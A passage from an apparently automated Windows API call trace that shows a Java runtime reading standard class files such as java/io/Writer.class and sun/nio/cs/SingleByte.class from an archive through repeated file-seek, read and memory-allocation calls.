liDistanceToMove=0x33ca8e7, lpNewFilePointer=0x208e890, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e890*=54307047) returned 1 [0095.462] ReadFile (in: hFile=0x134, lpBuffer=0x12218e20, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e860, lpOverlapped=0x0 | out: lpBuffer=0x12218e20*, lpNumberOfBytesRead=0x208e860*=0xa0, lpOverlapped=0x0) returned 1 [0095.463] malloc (_Size=0x18) returned 0x1220c700 [0095.463] free (_Block=0x12218e20) [0095.464] strlen (_Str="sun/nio/cs/IBM437.class") returned 0x17 [0095.464] strcpy (in: _Dest=0x208ea10, _Source="sun/nio/cs/IBM437.class" | out: _Dest="sun/nio/cs/IBM437.class") returned="sun/nio/cs/IBM437.class" [0095.464] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x25cb12a, lpNewFilePointer=0x208e490, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e490*=39629098) returned 1 [0095.464] ReadFile (in: hFile=0x134, lpBuffer=0x208e4e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e460, lpOverlapped=0x0 | out: lpBuffer=0x208e4e0*, lpNumberOfBytesRead=0x208e460*=0x1e, lpOverlapped=0x0) returned 1 [0095.466] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x25cb15f, lpNewFilePointer=0x208e4f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e4f0*=39629151) returned 1 [0095.466] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x687, lpNumberOfBytesRead=0x208e4c0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208e4c0*=0x687, lpOverlapped=0x0) returned 1 [0095.466] free (_Block=0x121d9f30) [0095.467] free (_Block=0x121d9850) [0095.468] strlen (_Str="sun/nio/cs/HistoricallyNamedCharset.class") returned 0x29 [0095.468] malloc (_Size=0x48) returned 0x121d9da0 [0095.468] malloc (_Size=0xa0) returned 0x12218e20 [0095.468] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341bd26, lpNewFilePointer=0x208ddd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ddd0*=54639910) returned 1 [0095.468] ReadFile (in: hFile=0x134, lpBuffer=0x12218e20, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dda0, lpOverlapped=0x0 | out: lpBuffer=0x12218e20*, lpNumberOfBytesRead=0x208dda0*=0xa0, lpOverlapped=0x0) returned 1 [0095.469] malloc (_Size=0x2a) returned 0x121d9f30 [0095.469] free (_Block=0x12218e20) [0095.469] strlen (_Str="sun/nio/cs/HistoricallyNamedCharset.class") returned 0x29 [0095.469] strcpy (in: _Dest=0x208df50, _Source="sun/nio/cs/HistoricallyNamedCharset.class" | out: _Dest="sun/nio/cs/HistoricallyNamedCharset.class") returned="sun/nio/cs/HistoricallyNamedCharset.class" [0095.469] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31847fb, lpNewFilePointer=0x208d9d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d9d0*=51922939) returned 1 [0095.469] ReadFile (in: hFile=0x134, lpBuffer=0x208da20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d9a0, lpOverlapped=0x0 | out: lpBuffer=0x208da20*, lpNumberOfBytesRead=0x208d9a0*=0x1e, lpOverlapped=0x0) returned 1 [0095.469] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3184842, lpNewFilePointer=0x208da30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208da30*=51923010) returned 1 [0095.469] ReadFile (in: hFile=0x134, lpBuffer=0x2103280, nNumberOfBytesToRead=0x87, lpNumberOfBytesRead=0x208da00, lpOverlapped=0x0 | out: lpBuffer=0x2103280*, lpNumberOfBytesRead=0x208da00*=0x87, lpOverlapped=0x0) returned 1 [0095.470] free (_Block=0x1220c700) [0095.470] free (_Block=0x121d9080) [0095.480] strlen (_Str="sun/nio/cs/SingleByte.class") returned 0x1b [0095.480] malloc (_Size=0x48) returned 0x121d9210 [0095.480] malloc (_Size=0xa0) returned 0x12218e20 [0095.480] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341bcdd, lpNewFilePointer=0x208d860, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d860*=54639837) returned 1 [0095.480] ReadFile (in: hFile=0x134, lpBuffer=0x12218e20, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d830, lpOverlapped=0x0 | out: lpBuffer=0x12218e20*, lpNumberOfBytesRead=0x208d830*=0xa0, lpOverlapped=0x0) returned 1 [0095.480] malloc (_Size=0x1c) returned 0x121d8180 [0095.480] free (_Block=0x12218e20) [0095.481] strlen (_Str="sun/nio/cs/SingleByte.class") returned 0x1b [0095.481] strcpy (in: _Dest=0x208d9e0, _Source="sun/nio/cs/SingleByte.class" | out: _Dest="sun/nio/cs/SingleByte.class") returned="sun/nio/cs/SingleByte.class" [0095.481] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31843c4, lpNewFilePointer=0x208d460, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d460*=51921860) returned 1 [0095.481] ReadFile (in: hFile=0x134, lpBuffer=0x208d4b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d430, lpOverlapped=0x0 | out: lpBuffer=0x208d4b0*, lpNumberOfBytesRead=0x208d430*=0x1e, lpOverlapped=0x0) returned 1 [0095.481] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31843fd, lpNewFilePointer=0x208d4c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d4c0*=51921917) returned 1 [0095.481] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x3fe, lpNumberOfBytesRead=0x208d490, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208d490*=0x3fe, lpOverlapped=0x0) returned 1 [0095.482] free (_Block=0x121d9f30) [0095.482] free (_Block=0x121d9da0) [0095.498] strlen (_Str="java/lang/Class$1.class") returned 0x17 [0095.498] malloc (_Size=0x48) returned 0x121d8fe0 [0095.498] malloc (_Size=0xa0) returned 0x12218e20 [0095.498] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341bc98, lpNewFilePointer=0x208e310, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e310*=54639768) returned 1 [0095.498] ReadFile (in: hFile=0x134, lpBuffer=0x12218e20, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e2e0, lpOverlapped=0x0 | out: lpBuffer=0x12218e20*, lpNumberOfBytesRead=0x208e2e0*=0xa0, lpOverlapped=0x0) returned 1 [0095.498] malloc (_Size=0x18) returned 0x1220cae0 [0095.499] free (_Block=0x12218e20) [0095.499] strlen (_Str="java/lang/Class$1.class") returned 0x17 [0095.499] strcpy (in: _Dest=0x208e490, _Source="java/lang/Class$1.class" | out: _Dest="java/lang/Class$1.class") returned="java/lang/Class$1.class" [0095.499] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31840b9, lpNewFilePointer=0x208df10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208df10*=51921081) returned 1 [0095.499] ReadFile (in: hFile=0x134, lpBuffer=0x208df60, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208dee0, lpOverlapped=0x0 | out: lpBuffer=0x208df60*, lpNumberOfBytesRead=0x208dee0*=0x1e, lpOverlapped=0x0) returned 1 [0095.499] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31840ee, lpNewFilePointer=0x208df70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208df70*=51921134) returned 1 [0095.499] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x2d6, lpNumberOfBytesRead=0x208df40, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208df40*=0x2d6, lpOverlapped=0x0) returned 1 [0095.499] free (_Block=0x121d8180) [0095.500] free (_Block=0x121d9210) [0095.509] malloc (_Size=0x48) returned 0x121d99e0 [0095.509] malloc (_Size=0xa0) returned 0x12218e20 [0095.509] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341bc45, lpNewFilePointer=0x208e170, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e170*=54639685) returned 1 [0095.509] ReadFile (in: hFile=0x134, lpBuffer=0x12218e20, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e140, lpOverlapped=0x0 | out: lpBuffer=0x12218e20*, lpNumberOfBytesRead=0x208e140*=0xa0, lpOverlapped=0x0) returned 1 [0095.509] malloc (_Size=0x26) returned 0x121d8090 [0095.510] free (_Block=0x12218e20) [0095.510] strlen (_Str="sun/reflect/ReflectionFactory$1.class") returned 0x25 [0095.510] strcpy (in: _Dest=0x208e2f0, _Source="sun/reflect/ReflectionFactory$1.class" | out: _Dest="sun/reflect/ReflectionFactory$1.class") returned="sun/reflect/ReflectionFactory$1.class" [0095.510] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3183bad, lpNewFilePointer=0x208dd70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dd70*=51919789) returned 1 [0095.510] ReadFile (in: hFile=0x134, lpBuffer=0x208ddc0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208dd40, lpOverlapped=0x0 | out: lpBuffer=0x208ddc0*, lpNumberOfBytesRead=0x208dd40*=0x1e, lpOverlapped=0x0) returned 1 [0095.545] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3183bf0, lpNewFilePointer=0x208ddd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ddd0*=51919856) returned 1 [0095.545] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x4c9, lpNumberOfBytesRead=0x208dda0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208dda0*=0x4c9, lpOverlapped=0x0) returned 1 [0095.545] free (_Block=0x1220cae0) [0095.546] free (_Block=0x121d8fe0) [0095.555] strlen (_Str="sun/reflect/NativeConstructorAccessorImpl.class") returned 0x2f [0095.555] malloc (_Size=0x48) returned 0x121d92b0 [0095.555] malloc (_Size=0xa0) returned 0x12218e20 [0095.555] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341bbe8, lpNewFilePointer=0x208e1c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e1c0*=54639592) returned 1 [0095.555] ReadFile (in: hFile=0x134, lpBuffer=0x12218e20, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e190, lpOverlapped=0x0 | out: lpBuffer=0x12218e20*, lpNumberOfBytesRead=0x208e190*=0xa0, lpOverlapped=0x0) returned 1 [0095.555] malloc (_Size=0x30) returned 0x121da370 [0095.556] free (_Block=0x12218e20) [0095.556] strlen (_Str="sun/reflect/NativeConstructorAccessorImpl.class") returned 0x2f [0095.556] strcpy (in: _Dest=0x208e340, _Source="sun/reflect/NativeConstructorAccessorImpl.class" | out: _Dest="sun/reflect/NativeConstructorAccessorImpl.class") returned="sun/reflect/NativeConstructorAccessorImpl.class" [0095.556] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3183462, lpNewFilePointer=0x208ddc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ddc0*=51917922) returned 1 [0095.556] ReadFile (in: hFile=0x134, lpBuffer=0x208de10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208dd90, lpOverlapped=0x0 | out: lpBuffer=0x208de10*, lpNumberOfBytesRead=0x208dd90*=0x1e, lpOverlapped=0x0) returned 1 [0095.556] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31834af, lpNewFilePointer=0x208de20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208de20*=51917999) returned 1 [0095.556] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x6fe, lpNumberOfBytesRead=0x208ddf0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208ddf0*=0x6fe, lpOverlapped=0x0) returned 1 [0095.557] free (_Block=0x121d8090) [0095.558] free (_Block=0x121d99e0) [0095.567] strlen (_Str="sun/reflect/DelegatingConstructorAccessorImpl.class") returned 0x33 [0095.567] malloc (_Size=0x48) returned 0x121d90d0 [0095.567] malloc (_Size=0xa0) returned 0x1221b230 [0095.567] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341bb87, lpNewFilePointer=0x208e1c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e1c0*=54639495) returned 1 [0095.567] ReadFile (in: hFile=0x134, lpBuffer=0x1221b230, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e190, lpOverlapped=0x0 | out: lpBuffer=0x1221b230*, lpNumberOfBytesRead=0x208e190*=0xa0, lpOverlapped=0x0) returned 1 [0095.567] malloc (_Size=0x34) returned 0x121daab0 [0095.568] free (_Block=0x1221b230) [0095.568] strlen (_Str="sun/reflect/DelegatingConstructorAccessorImpl.class") returned 0x33 [0095.568] strcpy (in: _Dest=0x208e340, _Source="sun/reflect/DelegatingConstructorAccessorImpl.class" | out: _Dest="sun/reflect/DelegatingConstructorAccessorImpl.class") returned="sun/reflect/DelegatingConstructorAccessorImpl.class" [0095.568] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31831b2, lpNewFilePointer=0x208ddc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ddc0*=51917234) returned 1 [0095.568] ReadFile (in: hFile=0x134, lpBuffer=0x208de10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208dd90, lpOverlapped=0x0 | out: lpBuffer=0x208de10*, lpNumberOfBytesRead=0x208dd90*=0x1e, lpOverlapped=0x0) returned 1 [0095.568] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3183203, lpNewFilePointer=0x208de20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208de20*=51917315) returned 1 [0095.568] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x25f, lpNumberOfBytesRead=0x208ddf0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208ddf0*=0x25f, lpOverlapped=0x0) returned 1 [0095.569] free (_Block=0x121da370) [0095.569] free (_Block=0x121d92b0) [0095.586] strlen (_Str="java/io/OutputStreamWriter.class") returned 0x20 [0095.586] malloc (_Size=0x48) returned 0x121d95d0 [0095.586] malloc (_Size=0xa0) returned 0x1221b230 [0095.586] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c224, lpNewFilePointer=0x208e5a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e5a0*=54641188) returned 1 [0095.587] ReadFile (in: hFile=0x134, lpBuffer=0x1221b230, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e570, lpOverlapped=0x0 | out: lpBuffer=0x1221b230*, lpNumberOfBytesRead=0x208e570*=0xa0, lpOverlapped=0x0) returned 1 [0095.587] malloc (_Size=0x21) returned 0x121d7e20 [0095.587] free (_Block=0x1221b230) [0095.588] strlen (_Str="java/io/OutputStreamWriter.class") returned 0x20 [0095.588] strcpy (in: _Dest=0x208e720, _Source="java/io/OutputStreamWriter.class" | out: _Dest="java/io/OutputStreamWriter.class") returned="java/io/OutputStreamWriter.class" [0095.588] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3197a96, lpNewFilePointer=0x208e1a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e1a0*=52001430) returned 1 [0095.588] ReadFile (in: hFile=0x134, lpBuffer=0x208e1f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e170, lpOverlapped=0x0 | out: lpBuffer=0x208e1f0*, lpNumberOfBytesRead=0x208e170*=0x1e, lpOverlapped=0x0) returned 1 [0095.589] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3197ad4, lpNewFilePointer=0x208e200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e200*=52001492) returned 1 [0095.589] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x7b3, lpNumberOfBytesRead=0x208e1d0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208e1d0*=0x7b3, lpOverlapped=0x0) returned 1 [0095.589] free (_Block=0x121daab0) [0095.590] free (_Block=0x121d90d0) [0095.594] strlen (_Str="java/io/Writer.class") returned 0x14 [0095.594] malloc (_Size=0x48) returned 0x121d8fe0 [0095.594] malloc (_Size=0xa0) returned 0x1221b230 [0095.594] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c1e2, lpNewFilePointer=0x208db60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208db60*=54641122) returned 1 [0095.594] ReadFile (in: hFile=0x134, lpBuffer=0x1221b230, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208db30, lpOverlapped=0x0 | out: lpBuffer=0x1221b230*, lpNumberOfBytesRead=0x208db30*=0xa0, lpOverlapped=0x0) returned 1 [0095.594] malloc (_Size=0x15) returned 0x1220cc60 [0095.595] free (_Block=0x1221b230) [0095.595] strlen (_Str="java/io/Writer.class") returned 0x14 [0095.595] strcpy (in: _Dest=0x208dce0, _Source="java/io/Writer.class" | out: _Dest="java/io/Writer.class") returned="java/io/Writer.class" [0095.595] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31972a6, lpNewFilePointer=0x208d760, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d760*=51999398) returned 1 [0095.595] ReadFile (in: hFile=0x134, lpBuffer=0x208d7b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d730, lpOverlapped=0x0 | out: lpBuffer=0x208d7b0*, lpNumberOfBytesRead=0x208d730*=0x1e, lpOverlapped=0x0) returned 1 [0095.595] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31972d8, lpNewFilePointer=0x208d7c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d7c0*=51999448) returned 1 [0095.595] ReadFile (in: hFile=0x134, lpBuffer=0x2103360, nNumberOfBytesToRead=0x7be, lpNumberOfBytesRead=0x208d790, lpOverlapped=0x0 | out: lpBuffer=0x2103360*, lpNumberOfBytesRead=0x208d790*=0x7be, lpOverlapped=0x0) returned 1 [0095.596] free (_Block=0x121d7e20) [0095.596] free (_Block=0x121d95d0) [0095.602] malloc (_Size=0x48) returned 0x121d95d0 [0095.602] malloc (_Size=0xa0) returned 0x1221b230 [0095.603] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c196, lpNewFilePointer=0x208e260, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e260*=54641046) returned 1 [0095.603] ReadFile (in: hFile=0x134, lpBuffer=0x1221b230, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e230, lpOverlapped=0x0 | out: lpBuffer=0x1221b230*, lpNumberOfBytesRead=0x208e230*=0xa0, lpOverlapped=0x0) returned 1 [0095.603] malloc (_Size=0x1f) returned 0x121d7eb0 [0095.603] free (_Block=0x1221b230) [0095.606] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3195a26, lpNewFilePointer=0x208de60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208de60*=51993126) returned 1 [0095.606] ReadFile (in: hFile=0x134, lpBuffer=0x208deb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208de30, lpOverlapped=0x0 | out: lpBuffer=0x208deb0*, lpNumberOfBytesRead=0x208de30*=0x1e, lpOverlapped=0x0) returned 1 [0095.606] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3195a62, lpNewFilePointer=0x208dec0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dec0*=51993186) returned 1 [0095.606] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x1844, lpNumberOfBytesRead=0x208de90, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208de90*=0x1844, lpOverlapped=0x0) returned 1 [0095.609] strlen (_Str="sun/nio/cs/SingleByte$Encoder.class") returned 0x23 [0095.609] malloc (_Size=0x48) returned 0x121d93f0 [0095.609] malloc (_Size=0xa0) returned 0x1221b230 [0095.610] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341bb36, lpNewFilePointer=0x208e3e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3e0*=54639414) returned 1 [0095.610] ReadFile (in: hFile=0x134, lpBuffer=0x1221b230, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e3b0, lpOverlapped=0x0 | out: lpBuffer=0x1221b230*, lpNumberOfBytesRead=0x208e3b0*=0xa0, lpOverlapped=0x0) returned 1 [0095.610] malloc (_Size=0x24) returned 0x121d7e20 [0095.610] free (_Block=0x1221b230) [0095.610] strlen (_Str="sun/nio/cs/SingleByte$Encoder.class") returned 0x23 [0095.611] strcpy (in: _Dest=0x208e560, _Source="sun/nio/cs/SingleByte$Encoder.class" | out: _Dest="sun/nio/cs/SingleByte$Encoder.class") returned="sun/nio/cs/SingleByte$Encoder.class" [0095.611] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x318262f, lpNewFilePointer=0x208dfe0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dfe0*=51914287) returned 1 [0095.611] ReadFile (in: hFile=0x134, lpBuffer=0x208e030, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208dfb0, lpOverlapped=0x0 | out: lpBuffer=0x208e030*, lpNumberOfBytesRead=0x208dfb0*=0x1e, lpOverlapped=0x0) returned 1 [0095.661] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3182670, lpNewFilePointer=0x208e040, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e040*=51914352) returned 1 [0095.661] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0xb42, lpNumberOfBytesRead=0x208e010, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208e010*=0xb42, lpOverlapped=0x0) returned 1 [0095.662] free (_Block=0x121d7eb0) [0095.662] free (_Block=0x121d95d0) [0095.665] strlen (_Str="sun/nio/cs/ArrayEncoder.class") returned 0x1d [0095.665] malloc (_Size=0x48) returned 0x121d8fe0 [0095.665] malloc (_Size=0xa0) returned 0x1221b230 [0095.665] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341baeb, lpNewFilePointer=0x208d920, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d920*=54639339) returned 1 [0095.665] ReadFile (in: hFile=0x134, lpBuffer=0x1221b230, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d8f0, lpOverlapped=0x0 | out: lpBuffer=0x1221b230*, lpNumberOfBytesRead=0x208d8f0*=0xa0, lpOverlapped=0x0) returned 1 [0095.665] malloc (_Size=0x1e) returned 0x121d7af0 [0095.665] free (_Block=0x1221b230) [0095.665] strlen (_Str="sun/nio/cs/ArrayEncoder.class") returned 0x1d [0095.666] strcpy (in: _Dest=0x208daa0, _Source="sun/nio/cs/ArrayEncoder.class" | out: _Dest="sun/nio/cs/ArrayEncoder.class") returned="sun/nio/cs/ArrayEncoder.class" [0095.666] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x318258c, lpNewFilePointer=0x208d520, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d520*=51914124) returned 1 [0095.666] ReadFile (in: hFile=0x134, lpBuffer=0x208d570, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d4f0, lpOverlapped=0x0 | out: lpBuffer=0x208d570*, lpNumberOfBytesRead=0x208d4f0*=0x1e, lpOverlapped=0x0) returned 1 [0095.666] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31825c7, lpNewFilePointer=0x208d580, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d580*=51914183) returned 1 [0095.666] ReadFile (in: hFile=0x134, lpBuffer=0x2103710, nNumberOfBytesToRead=0x68, lpNumberOfBytesRead=0x208d550, lpOverlapped=0x0 | out: lpBuffer=0x2103710*, lpNumberOfBytesRead=0x208d550*=0x68, lpOverlapped=0x0) returned 1 [0095.666] free (_Block=0x121d7e20) [0095.667] free (_Block=0x121d93f0) [0095.672] strlen (_Str="java/nio/charset/CharsetEncoder.class") returned 0x25 [0095.672] malloc (_Size=0x48) returned 0x121d9df0 [0095.672] malloc (_Size=0xa0) returned 0x1221b230 [0095.672] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ba98, lpNewFilePointer=0x208d9a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d9a0*=54639256) returned 1 [0095.672] ReadFile (in: hFile=0x134, lpBuffer=0x1221b230, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d970, lpOverlapped=0x0 | out: lpBuffer=0x1221b230*, lpNumberOfBytesRead=0x208d970*=0xa0, lpOverlapped=0x0) returned 1 [0095.672] malloc (_Size=0x26) returned 0x121d7a30 [0095.672] free (_Block=0x1221b230) [0095.673] strlen (_Str="java/nio/charset/CharsetEncoder.class") returned 0x25 [0095.673] strcpy (in: _Dest=0x208db20, _Source="java/nio/charset/CharsetEncoder.class" | out: _Dest="java/nio/charset/CharsetEncoder.class") returned="java/nio/charset/CharsetEncoder.class" [0095.673] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3180ad9, lpNewFilePointer=0x208d5a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d5a0*=51907289) returned 1 [0095.673] ReadFile (in: hFile=0x134, lpBuffer=0x208d5f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d570, lpOverlapped=0x0 | out: lpBuffer=0x208d5f0*, lpNumberOfBytesRead=0x208d570*=0x1e, lpOverlapped=0x0) returned 1 [0095.724] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3180b1c, lpNewFilePointer=0x208d600, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d600*=51907356) returned 1 [0095.725] ReadFile (in: hFile=0x134, lpBuffer=0x2103720, nNumberOfBytesToRead=0x1a70, lpNumberOfBytesRead=0x208d5d0, lpOverlapped=0x0 | out: lpBuffer=0x2103720*, lpNumberOfBytesRead=0x208d5d0*=0x1a70, lpOverlapped=0x0) returned 1 [0095.790] free (_Block=0x121d7af0) [0095.791] free (_Block=0x121d8fe0) [0095.806] strlen (_Str="java/nio/charset/CodingErrorAction.class") returned 0x28 [0095.806] malloc (_Size=0x48) returned 0x121d9c60 [0095.806] malloc (_Size=0xa0) returned 0x1221b230 [0095.806] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ba42, lpNewFilePointer=0x208e130, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e130*=54639170) returned 1 [0095.806] ReadFile (in: hFile=0x134, lpBuffer=0x1221b230, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e100, lpOverlapped=0x0 | out: lpBuffer=0x1221b230*, lpNumberOfBytesRead=0x208e100*=0xa0, lpOverlapped=0x0) returned 1 [0095.806] malloc (_Size=0x29) returned 0x121daab0 [0095.806] free (_Block=0x1221b230) [0095.807] strlen (_Str="java/nio/charset/CodingErrorAction.class") returned 0x28 [0095.807] strcpy (in: _Dest=0x208e2b0, _Source="java/nio/charset/CodingErrorAction.class" | out: _Dest="java/nio/charset/CodingErrorAction.class") returned="java/nio/charset/CodingErrorAction.class" [0095.807] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x318089c, lpNewFilePointer=0x208dd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dd30*=51906716) returned 1 [0095.807] ReadFile (in: hFile=0x134, lpBuffer=0x208dd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208dd00, lpOverlapped=0x0 | out: lpBuffer=0x208dd80*, lpNumberOfBytesRead=0x208dd00*=0x1e, lpOverlapped=0x0) returned 1 [0095.807] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31808e2, lpNewFilePointer=0x208dd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dd90*=51906786) returned 1 [0095.807] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0x1f7, lpNumberOfBytesRead=0x208dd60, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208dd60*=0x1f7, lpOverlapped=0x0) returned 1 [0095.807] free (_Block=0x121d7a30) [0095.808] free (_Block=0x121d9df0) [0095.814] malloc (_Size=0x48) returned 0x121d96c0 [0095.814] malloc (_Size=0xa0) returned 0x1221b230 [0095.814] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b9fb, lpNewFilePointer=0x208e120, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e120*=54639099) returned 1 [0095.814] ReadFile (in: hFile=0x134, lpBuffer=0x1221b230, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e0f0, lpOverlapped=0x0 | out: lpBuffer=0x1221b230*, lpNumberOfBytesRead=0x208e0f0*=0xa0, lpOverlapped=0x0) returned 1 [0095.815] malloc (_Size=0x1a) returned 0x121d8090 [0095.815] free (_Block=0x1221b230) [0095.815] strlen (_Str="java/nio/ByteBuffer.class") returned 0x19 [0095.816] strcpy (in: _Dest=0x208e2a0, _Source="java/nio/ByteBuffer.class" | out: 